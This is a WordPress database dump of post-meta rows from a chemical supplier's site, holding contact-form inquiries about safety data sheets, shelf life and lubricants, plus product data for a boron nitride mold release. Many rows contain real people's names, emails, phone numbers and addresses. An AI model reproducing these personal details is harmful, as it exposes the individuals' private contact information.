INSERT INTO `wp_postmeta` VALUES (33650, 3783, '_seq_num', '383'); 
INSERT INTO `wp_postmeta` VALUES (33651, 3783, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (33652, 3783, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (33653, 3783, '_field_1', 'Alaina Jackson'); 
INSERT INTO `wp_postmeta` VALUES (33654, 3783, '_field_10', 'Chief-exhibitus'); 
INSERT INTO `wp_postmeta` VALUES (33655, 3783, '_field_2', 'alaina.jk@outlook.com'); 
INSERT INTO `wp_postmeta` VALUES (33656, 3783, '_field_8', '(985) 658-7458'); 
INSERT INTO `wp_postmeta` VALUES (33657, 3783, '_field_3', 'Hi,\r\n\r\nHope you are doing well!\r\n\r\nThis is Alaina, would you be interested in using our updated Opt-in Database which can help you to reach “Composites &amp; Advanced Materials” Industry buyers directly. Our area of expertise USA UK &amp; Australia. With the help of our Comprehensive &amp; Accurate Source of Potential Buyers data, you can expand your business and penetrate new markets. \r\n\r\nTitles/Job Functions:- \r\n\r\n•	President / CEOs \r\n•	Owner / VP&#039;s\r\n•	Production Manager\r\n•	Manufacturing Head\r\n•	Design Engineer\r\n•	Quality Controller\r\n•	Research &amp; Development Manager\r\n•	Sales &amp; Marketing Manager\r\n•	Decision Makers\r\n•	Engineer / Speci¬ers\r\n•	Purchaser / Estimator\r\n•	Service Providers\r\n•	Manufacturers &amp; Suppliers\r\n\r\nPlease fill in your exact Target criteria in the below-mentioned format, So that I can run counts and get back to you with samples and benefits for your review.\r\n\r\nTarget Title: _________ Target Industry: ______________   Target Geography: _____________ \r\n\r\nThe database contains Company and Contact Name, Title, Telephone Number, Verified Email Address, Mailing Address, Fax Number, Revenue Size &amp; No. of Employee Size, SIC/NAICS and much more.\r\n\r\nLook forward to your response. Thank you so much for reading my email even in your busy schedule.\r\n\r\nWarm Regards,\r\n\r\nAlaina Jackson\r\nBusiness Development Coordinator\r\nOnline Marketing Department\r\nB2B | E-mail Appending | Data Appending Services\r\nUSA/UK/Australia\r\n'); 
INSERT INTO `wp_postmeta` VALUES (33658, 3783, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (33659, 3783, '_sub_id', '3783'); 
INSERT INTO `wp_postmeta` VALUES (33660, 3784, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (33661, 3784, '_seq_num', '384'); 
INSERT INTO `wp_postmeta` VALUES (33662, 3784, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (33663, 3784, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (33664, 3784, '_field_1', 'Emma Rawnsley'); 
INSERT INTO `wp_postmeta` VALUES (33665, 3784, '_field_10', 'AECOM'); 
INSERT INTO `wp_postmeta` VALUES (33666, 3784, '_field_2', 'emma.rawnsley@aecom.com'); 
INSERT INTO `wp_postmeta` VALUES (33667, 3784, '_field_8', '(408) 386-4182'); 
INSERT INTO `wp_postmeta` VALUES (33668, 3784, '_field_3', 'Hi, I am undertaking a chemical inventory/SDS database update for client, and they have one of your products in their lab for which they don&#039;t have an SDS. Could you please send me the SDS for the following product:\r\nMS-122AD PTFE Release Agent Dry Lubricant (14oz aerosol)\r\n\r\nThanks, Emma '); 
INSERT INTO `wp_postmeta` VALUES (33669, 3784, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (33670, 3784, '_sub_id', '3784'); 
INSERT INTO `wp_postmeta` VALUES (33671, 3785, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (33672, 3785, '_seq_num', '240'); 
INSERT INTO `wp_postmeta` VALUES (33673, 3785, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (33674, 3785, '_field_12', 'Gnana Vishnu Durgam'); 
INSERT INTO `wp_postmeta` VALUES (33675, 3785, '_field_13', 'Michigan Technological University'); 
INSERT INTO `wp_postmeta` VALUES (33676, 3785, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (33677, 3785, '_field_14', 'gdurgam@mtu.edu'); 
INSERT INTO `wp_postmeta` VALUES (33678, 3785, '_field_15', '(906) 275-8026'); 
INSERT INTO `wp_postmeta` VALUES (33679, 3785, '_field_16', 'Hello Sir/Mam,\r\n\r\nI am a graduate student pursuing my Master&#039;s in Mechanical Engineering from Michigan Technological University. I am currently working on research associated with the fabrication of anti-icing surfaces and am in need of the following chemical to continue my research.\r\n\r\n1) DuPont Krytox PFPE GPL 100 (Density 1870 kg/m3 at 0 °C; kinematic viscosity 0.12 cm2/s, evaporation rate 0.59%/day\r\n\r\nCan you please provide me few details regarding the product.\r\n\r\n1) What is the procedure to purchase the product? \r\n2) Are there any restrictions on the purchase of the product?\r\n3) What is the unit cost of the product?\r\n4) Will the product be shipped to the university if purchased?\r\n5) What is the minimum quantity of purchase required?\r\n\r\nThank you for your help.\r\nGnana Vishnu Durgam'); 
INSERT INTO `wp_postmeta` VALUES (33680, 3785, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (33681, 3785, '_sub_id', '3785'); 
INSERT INTO `wp_postmeta` VALUES (33682, 3786, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (33683, 3786, '_seq_num', '385'); 
INSERT INTO `wp_postmeta` VALUES (33684, 3786, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (33685, 3786, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (33686, 3786, '_field_1', 'Martin'); 
INSERT INTO `wp_postmeta` VALUES (33687, 3786, '_field_10', 'Air New Zealand'); 
INSERT INTO `wp_postmeta` VALUES (33688, 3786, '_field_2', 'martin.cochrane@airnz.co.nz'); 
INSERT INTO `wp_postmeta` VALUES (33689, 3786, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (33690, 3786, '_field_3', 'Please advise if MS-122AD has a shelf life. we received a lot that suggests it has a 12 month &quot;warranty&quot; life'); 
INSERT INTO `wp_postmeta` VALUES (33691, 3786, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (33692, 3786, '_sub_id', '3786'); 
INSERT INTO `wp_postmeta` VALUES (33693, 3787, '_edit_lock', '1496232994:3'); 
INSERT INTO `wp_postmeta` VALUES (33694, 3787, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (33695, 3788, '_wp_attached_file', '2017/03/ReleaSys-HT.pdf'); 
INSERT INTO `wp_postmeta` VALUES (33696, 3789, '_wp_attached_file', '2017/03/shutterstock_442773265.jpg'); 
INSERT INTO `wp_postmeta` VALUES (33697, 3789, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1000;s:6:"height";i:667;s:4:"file";s:34:"2017/03/shutterstock_442773265.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_442773265-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_442773265-800x534.jpg";s:5:"width";i:800;s:6:"height";i:534;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_442773265-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_442773265-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_442773265-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_442773265-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_442773265-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (33698, 3787, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (33699, 3787, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (33700, 3787, '_thumbnail_id', '3789'); 
INSERT INTO `wp_postmeta` VALUES (33701, 3787, '312_default_editor', '<strong>Physical Properties:</strong>\r\n\r\nPrimary Polymer:…...Discrete Ceramic particle complex\r\n\r\nAppearance:………...White particle suspension\r\n\r\nOdor:………………....None\r\n\r\nSpecific Gravity:…….1.0 g/mL @ 25°C'); 
INSERT INTO `wp_postmeta` VALUES (33702, 3787, '716_default_editor', '<strong> </strong><strong>Recommended Application Procedure</strong>\r\n<ol>\r\n 	<li>Clean surface thoroughly. Mechanical cleaning such as bead media blasting or steel wool, followed by chemical cleaning, provides the best surface for application of Boron Nitride. Removal of all previous contaminates is critical.</li>\r\n 	<li>Lightly swirl ReleaSys<sup>™</sup> HT, making sure to re-disperse all particles prior and during use. Mold temperature would ideally be above 180 °F prior to application. Apply approximately 8-10 inches away from surface, and apply a light coat. NOTE: Material will apply wet and transparent, but will dry to a fine-white coat.</li>\r\n 	<li>Allow to dry completely. Heat mold to operational temperatures (&gt;500° C) to allow boron nitride to adhere to surface. Apply 1-3 coats and repeat heat cycle to maximize release performance.  If using as a dry lubricant or barrier, allow to dry and then apply 1 additional coat to guarantee uniform coverage.</li>\r\n</ol>'); 
INSERT INTO `wp_postmeta` VALUES (33703, 3787, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (33704, 3787, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (33705, 3787, '318_custom_list_file', 'a:1:{s:32:"d87090d8ea663142a91b18e971154278";a:3:{s:4:"name";s:11:"ReleaSys HT";s:4:"file";s:76:"https://www.miller-stephenson.com/wp-content/uploads/2017/03/ReleaSys-HT.pdf";s:4:"desc";s:29:"High Temperature Mold Release";}}'); 
INSERT INTO `wp_postmeta` VALUES (33706, 3787, '317_default_editor', 'Quart, Gallons, 5 Gallons, 55 Gallon Drums, 275 Gallon totes'); 
INSERT INTO `wp_postmeta` VALUES (33707, 3787, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (33708, 3787, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (33709, 3787, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (33710, 3787, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (33711, 3787, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (33712, 3787, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (33713, 3787, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (33714, 3787, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (33715, 3787, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (33716, 3787, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (33717, 3787, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (33718, 3787, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (33719, 3787, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (33720, 3787, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (33721, 3787, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (33722, 3787, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (33723, 3787, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (33724, 3787, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (33725, 3787, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (33726, 3787, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (33727, 3787, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (33728, 3787, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (33729, 3787, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (33730, 3787, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (33731, 3787, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (33732, 3787, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (33733, 3787, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (33734, 3787, '_product_version', '2.6.11'); 
INSERT INTO `wp_postmeta` VALUES (33735, 3787, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (33736, 3787, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (33737, 3787, '_ywtm_priority_tab_description', '1'); 
INSERT INTO `wp_postmeta` VALUES (33738, 3787, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (33739, 3787, '_ywtm_content_tab_description', 'ReleaSys<sup>™</sup> HT is a specialized, water-based release agent specifically designed for high temperature molding operations.  This formula utilizes a proprietary boron nitride complex to achieve unmatched lubricity and mold release performance. ReleaSys<sup>™</sup> HT boron nitride coatings prevent sticking to increase life of dies/molds, improve product surface finishes, and reduce production times. ReleaSys HT makes an excellent surface coating for molds used to produce castings of light metals such as magnesium and for coating surfaces in glass making operations. Our formulation is 100% VOC-free making it an eco-friendly and safer alternative to solvent-based alternatives. Applications include:\r\n<ul>\r\n 	<li>Mold Release for High Temperature and Difficult to Mold Polymers and Composites</li>\r\n 	<li>Mold release for Casting Metals and Glass</li>\r\n 	<li>Mold Dressing for Powder Metal Processing</li>\r\n 	<li>Surface Coating for High Temperature Surface</li>\r\n 	<li>Barrier Coating for Aggressive Environmental processes</li>\r\n 	<li>Specialty Lubricant for Drawing and Working Metals</li>\r\n</ul>\r\nBoron nitride coatings developed by proper application of ReleaSys HT are extremely durable and stable, allowing for longer operational time before re-application is necessary.  Miller-Stephenson\'s proprietary boron nitride complex technology allows for greater surface adhesion, lubricity, and stability meaning operators can mold more parts without the need for constant re-application.  Moreover our boron nitride coatings exhibit minimal mold fouling and transfer, allowing expensive molds to remain in service longer with the need for expensive re-surfacing to occur. Our boron nitride coating within ReleaSys HT can inhibit corrosion and chemical attack in metal forming, glass-making and sintering processes, thereby increasing die life and improving product quality.\r\n\r\n<a href="https://www.miller-stephenson.com/mold-release-agents/">For help with choosing which mold release is right for your application check out article section here</a>'); 
INSERT INTO `wp_postmeta` VALUES (33740, 3787, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (33741, 3787, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (33742, 3787, '_yoast_wpseo_primary_product_cat', '20'); 
INSERT INTO `wp_postmeta` VALUES (33743, 3787, '_yoast_wpseo_focuskw_text_input', 'Boron Nitride Coatings'); 
INSERT INTO `wp_postmeta` VALUES (33744, 3787, '_yoast_wpseo_focuskw', 'Boron Nitride Coatings'); 
INSERT INTO `wp_postmeta` VALUES (33745, 3787, '_yoast_wpseo_title', 'Boron Nitride Coatings | Water-Based High-Temperature Coatings | ReleaSys HT'); 
INSERT INTO `wp_postmeta` VALUES (33746, 3787, '_yoast_wpseo_metadesc', 'ReleaSys HT provides superior boron nitride coatings in a water-based, VOC-free formulation, applicable in high temperature molding and casting operations'); 
INSERT INTO `wp_postmeta` VALUES (33747, 3787, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (33748, 3787, '_yoast_wpseo_focuskeywords', '[{"keyword":"ReleaSys HT","score":"na"}]'); 
INSERT INTO `wp_postmeta` VALUES (33749, 3787, '_yoast_wpseo_linkdex', '98'); 
INSERT INTO `wp_postmeta` VALUES (33750, 3790, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (33751, 3790, '_seq_num', '386'); 
INSERT INTO `wp_postmeta` VALUES (33752, 3790, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (33753, 3790, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (33754, 3790, '_field_1', 'Michelle McCabe'); 
INSERT INTO `wp_postmeta` VALUES (33755, 3790, '_field_10', 'Danbury High School'); 
INSERT INTO `wp_postmeta` VALUES (33756, 3790, '_field_2', 'mccabm@danbury.k12.ct.us'); 
INSERT INTO `wp_postmeta` VALUES (33757, 3790, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (33758, 3790, '_field_3', 'Hello,\r\n\r\nI am a high school chemistry teacher and was wondering if your company offers a tour of your company as I have many students interested in pursuing a career in chemistry'); 
INSERT INTO `wp_postmeta` VALUES (33759, 3790, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (33760, 3790, '_sub_id', '3790'); 
INSERT INTO `wp_postmeta` VALUES (33761, 3791, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (33762, 3791, '_seq_num', '387'); 
INSERT INTO `wp_postmeta` VALUES (33763, 3791, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (33764, 3791, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (33765, 3791, '_field_1', 'Marc Winkler'); 
INSERT INTO `wp_postmeta` VALUES (33766, 3791, '_field_10', 'DB Schenker'); 
INSERT INTO `wp_postmeta` VALUES (33767, 3791, '_field_2', 'marc.winkler@dbschenker.com'); 
INSERT INTO `wp_postmeta` VALUES (33768, 3791, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (33769, 3791, '_field_3', 'Hello,\r\n\r\nI need for the material:\r\nPlastic-Glas-Metal Cleaner MS260 \r\nNSN 7930-01-064-5179\r\na German MSDS.\r\nIf you don´t have a German MSDS, then please in English please.\r\n\r\nThank you.\r\n\r\nMit freundlichen Grüßen / Best Regards\r\n\r\nMarc Winkler\r\nShared Logistic Center \r\n\r\nSchenker Deutschland AG\r\nHITW \r\nAlt: Dykerhoffstr. 4/64 \r\nNeu: Zur Luftbrücke 1\r\n31515 Wunstorf\r\nPhone: +49 (0) 5137 90695736\r\nMobile: +49 (0) 175 6545658\r\nE-Mail: marc.winkler@dbschenker.com\r\nhttp://www.dbschenker.com/de\r\n\r\nSchenker Deutschland AG\r\nGeschäftsstelle Hannover-Logistik\r\nMünchnerstr. 37\r\n30855 Langenhagen\r\n\r\nPhone:  +49 (0) 511 51541813\r\nMobile: +49 (0) 175 6545658\r\nFax: +49 (0) 511 51541819\r\nE-Mail: marc.winkler@dbschenker.com\r\nhttp://www.dbschenker.com/de\r\n\r\nWir arbeiten ausschließlich auf Grundlage der Allgemeinen Deutschen Spediteurbedingungen 2017 - ADSp 2017 - und - soweit diese für die Erbringung logistischer Leistungen nicht gelten – nach den Logistik-AGB, Stand März 2006. Hinweis: Die ADSp 2017 weichen in Ziffer 23 hinsichtlich des Haftungshöchstbetrages für Güterschäden (§ 431 HGB) vom Gesetz ab, indem sie die Haftung bei multimodalen Transporten unter Einschluss einer Seebeförderung und bei unbekanntem Schadenort auf 2 SZR/kg und im Übrigen die Regelhaftung von 8,33 SZR/kg zusätzlich auf 1,25 Millionen Euro je Schadenfall sowie 2,5 Millionen Euro je Schadenereignis, mindestens aber 2 SZR/kg, beschränken.\r\n\r\nWe operate exclusively in accordance with the Allgemeine Deutsche Spediteurbedingungen 2017 - ADSp 2017 - (German Freight Forwarders&#039; General Terms and Conditions 2017) and – if they do not apply for performing logistics services - with the Logistic-AGB (General Terms and Conditions of Logistics-Services Providers), as of March 2006. Note: In clause 23 the ADSp 2017 deviates from the statutory liability limitation in section 431 German Commercial Code (HGB) by limiting the liability for multimodal transportation with the involvement of sea carriage and an unknown damage location to 2 SDR/kg and, for the rest, the customary liability limitation of 8.33 SDR/kg additionally to Euro 1.25 million per damage claim and EUR 2.5 million per damage event, but not less than 2 SDR/kg.\r\n'); 
INSERT INTO `wp_postmeta` VALUES (33770, 3791, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (33771, 3791, '_sub_id', '3791'); 
INSERT INTO `wp_postmeta` VALUES (33772, 3792, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (33773, 3792, '_seq_num', '388'); 
INSERT INTO `wp_postmeta` VALUES (33774, 3792, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (33775, 3792, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (33776, 3792, '_field_1', 'test'); 
INSERT INTO `wp_postmeta` VALUES (33777, 3792, '_field_10', 'test'); 
INSERT INTO `wp_postmeta` VALUES (33778, 3792, '_field_2', 'test@test.com'); 
INSERT INTO `wp_postmeta` VALUES (33779, 3792, '_field_8', '(343) 434-4344'); 
INSERT INTO `wp_postmeta` VALUES (33780, 3792, '_field_3', '34343sdgdfg'); 
INSERT INTO `wp_postmeta` VALUES (33781, 3792, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (33782, 3792, '_sub_id', '3792'); 
INSERT INTO `wp_postmeta` VALUES (33783, 3794, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (33784, 3794, '_seq_num', '389'); 
INSERT INTO `wp_postmeta` VALUES (33785, 3794, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (33786, 3794, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (33787, 3794, '_field_1', 'Test dsdsd'); 
INSERT INTO `wp_postmeta` VALUES (33788, 3794, '_field_10', ''); 
INSERT INTO `wp_postmeta` VALUES (33789, 3794, '_field_2', 'ddillulio@mschem.com'); 
INSERT INTO `wp_postmeta` VALUES (33790, 3794, '_field_8', '(221) 222-2222'); 
INSERT INTO `wp_postmeta` VALUES (33791, 3794, '_field_3', 'dfsdfsdf'); 
INSERT INTO `wp_postmeta` VALUES (33792, 3794, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (33793, 3794, '_sub_id', '3794'); 
INSERT INTO `wp_postmeta` VALUES (33794, 3795, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (33795, 3795, '_seq_num', '241'); 
INSERT INTO `wp_postmeta` VALUES (33796, 3795, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (33797, 3795, '_field_12', 'Jeff Macedo'); 
INSERT INTO `wp_postmeta` VALUES (33798, 3795, '_field_13', 'Curtiss/Wright integrated sensing inc.-Gilbert'); 
INSERT INTO `wp_postmeta` VALUES (33799, 3795, '_field_18', '1840749'); 
INSERT INTO `wp_postmeta` VALUES (33800, 3795, '_field_14', 'jmacedo@curtisswright.com'); 
INSERT INTO `wp_postmeta` VALUES (33801, 3795, '_field_15', '(480) 758-6026'); 
INSERT INTO `wp_postmeta` VALUES (33802, 3795, '_field_16', 'I attempted to replenish my supply of PTFE release agent/dry lube number MS-143E and was informed it is no longer available.  We are using on Teflon molds with stycast epoxy and need to find a suitable replacement.  Please contact me via e-mail or at the number above at extension 7045.\nThank you\nJeff  '); 
INSERT INTO `wp_postmeta` VALUES (33803, 3795, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (33804, 3795, '_sub_id', '3795'); 
INSERT INTO `wp_postmeta` VALUES (33805, 3796, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (33806, 3796, '_seq_num', '242'); 
INSERT INTO `wp_postmeta` VALUES (33807, 3796, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (33808, 3796, '_field_12', 'Warren'); 
INSERT INTO `wp_postmeta` VALUES (33809, 3796, '_field_13', 'Miller-Stephenson Chemical Company'); 
INSERT INTO `wp_postmeta` VALUES (33810, 3796, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (33811, 3796, '_field_14', 'wmarotta@mschem.com'); 
INSERT INTO `wp_postmeta` VALUES (33812, 3796, '_field_15', '(203) 743-4447'); 
INSERT INTO `wp_postmeta` VALUES (33813, 3796, '_field_16', 'Testing '); 
INSERT INTO `wp_postmeta` VALUES (33814, 3796, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (33815, 3796, '_sub_id', '3796'); 
INSERT INTO `wp_postmeta` VALUES (33816, 3791, '_edit_lock', '1488831855:2'); 
INSERT INTO `wp_postmeta` VALUES (33817, 3790, '_edit_lock', '1488808190:2'); 
INSERT INTO `wp_postmeta` VALUES (33818, 3786, '_edit_lock', '1488808212:2'); 
INSERT INTO `wp_postmeta` VALUES (33819, 3795, '_edit_lock', '1488808279:2'); 
INSERT INTO `wp_postmeta` VALUES (33820, 3798, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (33821, 3798, '_seq_num', '243'); 
INSERT INTO `wp_postmeta` VALUES (33822, 3798, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (33823, 3798, '_field_12', 'John Mohler'); 
INSERT INTO `wp_postmeta` VALUES (33824, 3798, '_field_13', 'UTC AEROSPACE SYSTEMS'); 
INSERT INTO `wp_postmeta` VALUES (33825, 3798, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (33826, 3798, '_field_14', 'john.mohler@utas.utc.com'); 
INSERT INTO `wp_postmeta` VALUES (33827, 3798, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (33828, 3798, '_field_16', 'We receive cans of MS-381HCM with a sticker applied over the original manufacture label with a twelve month expiration date, it is unclear who applies this supplemental label.  It is common practice for expiration dates to be applied as a first in first out inventory control measure. \nIs this expiration date intended for inventory control?\nDoes MS-381HCM really have an expiration date if stored under climate controlled conditions?'); 
INSERT INTO `wp_postmeta` VALUES (33829, 3798, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (33830, 3798, '_sub_id', '3798'); 
INSERT INTO `wp_postmeta` VALUES (33831, 3799, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (33832, 3799, '_seq_num', '244'); 
INSERT INTO `wp_postmeta` VALUES (33833, 3799, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (33834, 3799, '_field_12', 'Ron Schutz'); 
INSERT INTO `wp_postmeta` VALUES (33835, 3799, '_field_13', 'Arconic Titanium &amp; Eng. Products'); 
INSERT INTO `wp_postmeta` VALUES (33836, 3799, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (33837, 3799, '_field_14', 'ronald.schutz@arconic.com'); 
INSERT INTO `wp_postmeta` VALUES (33838, 3799, '_field_15', '(330) 544-7846'); 
INSERT INTO `wp_postmeta` VALUES (33839, 3799, '_field_16', 'Question concerning the best lubricant you might have for extreme sliding metal galling/seizing wear problems with high contact pressure/interference titanium to titanium pipe threaded connections/seals. Get severe galling after one connection makeup/breakout at ambient temp./air conditions.  Any ideas/recommendations?   '); 
INSERT INTO `wp_postmeta` VALUES (33840, 3799, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (33841, 3799, '_sub_id', '3799'); 
INSERT INTO `wp_postmeta` VALUES (33842, 3800, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (33843, 3800, '_seq_num', '390'); 
INSERT INTO `wp_postmeta` VALUES (33844, 3800, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (33845, 3800, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (33846, 3800, '_field_1', 'Test test'); 
INSERT INTO `wp_postmeta` VALUES (33847, 3800, '_field_10', 'werwerwer'); 
INSERT INTO `wp_postmeta` VALUES (33848, 3800, '_field_2', 'ddilulio@mschem.com'); 
INSERT INTO `wp_postmeta` VALUES (33849, 3800, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (33850, 3800, '_field_3', 'test'); 
INSERT INTO `wp_postmeta` VALUES (33851, 3800, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (33852, 3800, '_sub_id', '3800'); 
INSERT INTO `wp_postmeta` VALUES (33853, 3801, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (33854, 3801, '_seq_num', '391'); 
INSERT INTO `wp_postmeta` VALUES (33855, 3801, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (33856, 3801, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (33857, 3801, '_field_1', 'dfsd sdsdf'); 
INSERT INTO `wp_postmeta` VALUES (33858, 3801, '_field_10', 'sd sdf'); 
INSERT INTO `wp_postmeta` VALUES (33859, 3801, '_field_2', 'dan@jfjfj.com'); 
INSERT INTO `wp_postmeta` VALUES (33860, 3801, '_field_8', ''); 
